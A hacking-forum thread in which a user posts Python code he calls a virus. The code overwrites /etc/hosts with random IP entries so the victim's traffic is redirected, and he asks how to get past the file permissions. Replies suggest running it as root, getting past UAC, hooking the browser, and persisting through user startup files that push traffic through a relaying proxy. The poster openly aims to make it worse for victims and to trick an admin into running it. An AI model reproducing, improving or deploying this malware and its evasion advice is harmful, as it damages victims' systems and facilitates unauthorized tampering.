[Python] Ultimate Redirector (Virus)

[parad0x]

Well, I got the idea of writing a virus that redirects you to a random ip whenever you try to visit any site, you'll be redirected to any random website. I have written the code so far but whenever I run this, it says, "You do not have permission to edit this file.". I want to ask, how to make this bypass this and write to this file?

Code: (Python) [Select]


import time
import random


def fake_ip():
    part1 = int(random.random() * 1000)
    part2 = int(random.random() * 1000)
    part3 = int(random.random() * 1000)
    part4 = int(random.random() * 1000)


    while part1 > 255:
        part1 = int(random.random() * 1000)


    while part2 > 255:
        part2 = int(random.random() * 1000)


    while part3 > 255:
        part3 = int(random.random() * 1000)


    while part4 > 254:
        part4 = int(random.random() * 1000)


    ip = str(part1) + "." + str(part2) + "." + str(part3) + "." + str(part4)


    return ip


def real_ip():
    i = 1
    start = time.time()
    file = open("/etc/hosts", 'w')
    print("Virus by parad0x\nInfecting...")
    while i < 2:
        if i == 2:
            break
        global ip
        ip = fake_ip()
        part2 = 0
        part3 = 0
        part4 = 0
        real  = str(i) + "." + str(part2) + '.' + str(part3)  + '.' + str(part4)
   
        while part4 < 2:
            part4 += 1
            real  = str(i) + "." + str(part2) + '.' + str(part3)  + '.' + str(part4)
            ip = fake_ip()
            file.write( ip + " " + real + "\n")
        while part3 < 2:
            part3 += 1
            part4 = 0
            while part4 < 2:
                part4 +=1
                real  = str(i) + "." + str(part2) + '.' + str(part3)  + '.' + str(part4)
                ip = fake_ip()
                file.write(ip + " " + real + "\n")
       


        while part2 < 2:
            part2 += 1
            part3 = 0
            part4 = 0
            while part3 < 2:
                part3 += 1
                part4 = 0
                while part4 < 2:
                    part4 +=1
                    real  = str(i) + "." + str(part2) + '.' + str(part3)  + '.' + str(part4)
                    ip = fake_ip()
                    file.write(ip + " " + real + "\n")
        i += 1
    file.close()
    end = time.time()
    print("Infected!")
    print("Total time taken : " + str(end - start) + " seconds.")


def main():
    real_ip()


main()




[proxx]

Attacking the hosts file is a very old and common method.
Windows protects it and so does any antivirus or alike.
The fact that it will blow all whistles and bells makes it useless..

Only administrator can edit it.

Its good thinking, dont take me wrong.

[Kulverstukas]

Indeed this method is very old. If you want to get uber l33t, you can make it hook into the browser and analyze the traffic as it goes, modifying packets and redirecting stuff
I don't know how doable this is, but you can try look into ettercap filters for some ideas.

[vezzy]

For Windows, if you find a way to get past UAC, this could be moderately useful, but as the previous posters said: old technique.

[proxx]

Indeed this method is very old. If you want to get uber l33t, you can make it hook into the browser and analyze the traffic as it goes, modifying packets and redirecting stuff
I don't know how doable this is, but you can try look into ettercap filters for some ideas.

Aswel as Paros proxy and Burp suite.

[Thor]

It is saying "You do not have permission to edit this file." because only superuser (root) can modify /etc/hosts.

If you run your script as root you shouldn't get this error.

[proxx]

lmfao,
I Assumed windows for a second here

On linux its indeed true that you need to be root to edit the file.
Interestingly sudo is by default not permitted to edit this.
I believe this is a distro depended issue, for example debian is much stricter when it comes to sec.
Correct me if Im wrong here.

[parad0x]

Attacking the hosts file is a very old and common method.
Windows protects it and so does any antivirus or alike.
The fact that it will blow all whistles and bells makes it useless..

Only administrator can edit it.

Its good thinking, dont take me wrong.

I won't take you wrong. Instead, I'll learn what kulver said to make it a better(or worse for victims) virus.


I posted it to know what amendments should I do to make it better.


But Kulver, what you said is somewhat hard, don't you think?

It is saying "You do not have permission to edit this file." because only superuser (root) can modify /etc/hosts.

If you run your script as root you shouldn't get this error.

I know this dude, I asked as all *nix users don't use root all time, only the administrator uses root.
But  if I say, its a nice hacking tool and you need to run this, you won't ask the admin to run that thing as he'll probably know what's there.

[proxx]

I won't take you wrong. Instead, I'll learn what kulver said to make it a better(or worse for victims) virus.


I posted it to know what amendments should I do to make it better.


But Kulver, what you said is somewhat hard, don't you think?

I know this dude, I asked as all *nix users don't use root all time, only the administrator uses root.
But  if I say, its a nice hacking tool and you need to run this, you won't ask the admin to run that thing as he'll probably know what's there.

If you want to do userbased shit;
One is able to do certain proxy settings for a bash shell.
In fact you could apply that to the entire user space if its ran at startup.
Files like .xinitrc or some of the magic behind the GUI logins are writeable by the by regular user in most cases.
You could do something that lets all the requests made launch through that proxy.
To make it more fun you could take some basic proxy scripts(write own?) and have them relay that traffic to random IP addresses.

*Just throwing around some ideas*